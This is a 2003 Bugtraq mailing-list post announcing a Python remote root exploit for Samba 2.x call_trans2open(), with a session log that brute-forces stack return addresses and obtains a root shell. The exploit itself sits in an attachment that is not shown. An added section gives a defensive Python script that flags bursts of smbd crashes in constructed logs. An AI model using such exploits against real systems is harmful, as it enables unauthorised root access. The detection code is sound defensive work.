Date: Tue, 8 Apr 2003 04:01:00 -0700 (PDT)
From: noir sin <noir@...mpos.org>
To: <bugtraq@...urityfocus.com>
Subject: samba 2.x call_trans2open() exploit


0day is fragile! One day it's your precious, the next day it's worthless ...

Anyway, I put together this SAMBAExploit class in Python, which might be
interesting for folks since it's reusable in a lot of other stuff ...

Python because: write a heap, stack or fmt string exploit class once and the
rest is just "cp old_exp.py new_exp.py; vi new_exp.py"

The exploit brute-forces the whole possible stack range and dups the already
connected socket for spawning the shell.

Greets to: Michael Teo for pysmb, lsd-pl for the linux/findsck shellcode

- noir

noir@...eof44:/tmp/samba_exp2 > python samba_exp.py 172.17.1.132
[*]  brute forcing well known addr range ... [*]
trying; retaddr: 0xbffed404
trying; retaddr: 0xbffed504
trying; retaddr: 0xbffed604
trying; retaddr: 0xbffed704
Linux localhost 2.4.9-e.3 #1 Fri May 3 17:02:43 EDT 2002 i686 unknown
cat /etc/redhat-rel*
Red Hat Linux Advanced Server release 2.1AS (Pensacola)
id
uid=0(root) gid=0(root) groups=99(nobody)
exit
*** Connection closed by remote host ***


Download attachment "samba_exp2.tar.gz" of type "APPLICATION/X-GUNZIP" (15799 bytes)
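Added defender-side example, not part of noir's post or the attached archive: the brute-force loop shown in the session above costs one crashed smbd child per wrong return-address guess, and Samba records each child crash in its log as an "INTERNAL ERROR: Signal 11" entry from lib/fault.c. A tight cluster of those entries is therefore a practical alerting signal for this class of attack. The log text below is constructed and only loosely modelled on the two-line log.smbd layout; the threshold and window values are assumptions to tune per site.

```python
"""Flag bursts of smbd crashes in a Samba log (added example, not from the post)."""
import re
from datetime import datetime, timedelta

# Constructed sample, loosely following Samba's log.smbd layout: a header
# line with timestamp, debug level and source location, then an indented
# message line. These are NOT real captured logs.
SAMPLE_LOG = """\
[2003/04/08 03:55:10, 1] smbd/service.c:make_connection(550)
  client connect to service public as user nobody (uid=99, gid=99) (pid 1188)
[2003/04/08 04:01:00, 0] lib/fault.c:fault_report(40)
  INTERNAL ERROR: Signal 11 in pid 1301 (2.2.x)
[2003/04/08 04:01:00, 0] lib/fault.c:fault_report(42)
  Please read the file BUGS.txt in the distribution
[2003/04/08 04:01:01, 0] lib/fault.c:fault_report(40)
  INTERNAL ERROR: Signal 11 in pid 1302 (2.2.x)
[2003/04/08 04:01:02, 0] lib/fault.c:fault_report(40)
  INTERNAL ERROR: Signal 11 in pid 1303 (2.2.x)
[2003/04/08 04:01:03, 0] lib/fault.c:fault_report(40)
  INTERNAL ERROR: Signal 11 in pid 1304 (2.2.x)
[2003/04/08 06:30:00, 0] lib/fault.c:fault_report(40)
  INTERNAL ERROR: Signal 11 in pid 1410 (2.2.x)
"""

HEADER_RE = re.compile(r"^\[(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}), (\d+)\] (\S+)$")
CRASH_RE = re.compile(r"^\s+INTERNAL ERROR: Signal (\d+) in pid (\d+)")


def parse_crashes(text):
    """Return a list of (timestamp, pid, signal) for every crash entry.

    The timestamp comes from the header line that precedes the message."""
    crashes = []
    ts = None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y/%m/%d %H:%M:%S")
            continue
        m = CRASH_RE.match(line)
        if m and ts is not None:
            crashes.append((ts, int(m.group(2)), int(m.group(1))))
    return crashes


def find_crash_bursts(crashes, threshold=3, window=timedelta(seconds=60)):
    """Sliding window over crash timestamps.

    Returns one (first_ts, last_ts, count, pids) tuple per burst of at least
    `threshold` crashes whose timestamps fall within `window`; overlapping
    windows are merged into a single burst. Threshold/window are assumed
    defaults, not Samba settings."""
    crashes = sorted(crashes)
    bursts = []
    start = 0
    for end in range(len(crashes)):
        # Drop the oldest entries until the window fits.
        while crashes[end][0] - crashes[start][0] > window:
            start += 1
        count = end - start + 1
        if count < threshold:
            continue
        first, last = crashes[start][0], crashes[end][0]
        pids = [c[1] for c in crashes[start:end + 1]]
        if bursts and first <= bursts[-1][1]:
            # Overlaps the previous burst: extend it instead of duplicating.
            prev_first, _, _, prev_pids = bursts[-1]
            merged = prev_pids + [p for p in pids if p not in prev_pids]
            bursts[-1] = (prev_first, last, len(merged), merged)
        else:
            bursts.append((first, last, count, pids))
    return bursts


def describe(bursts):
    """Human-readable alert lines, one per burst."""
    return [
        "ALERT: %d smbd crashes between %s and %s (pids %s)"
        % (count, first.isoformat(), last.isoformat(),
           ", ".join(str(p) for p in pids))
        for first, last, count, pids in bursts
    ]


if __name__ == "__main__":
    for line in describe(find_crash_bursts(parse_crashes(SAMPLE_LOG))):
        print(line)
```

The isolated crash at 06:30 is ignored while the four crashes within a few seconds at 04:01 are reported as one burst; in practice you would feed the live log.smbd (or per-machine log.%m files) through `parse_crashes` and raise the alert from `describe`.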
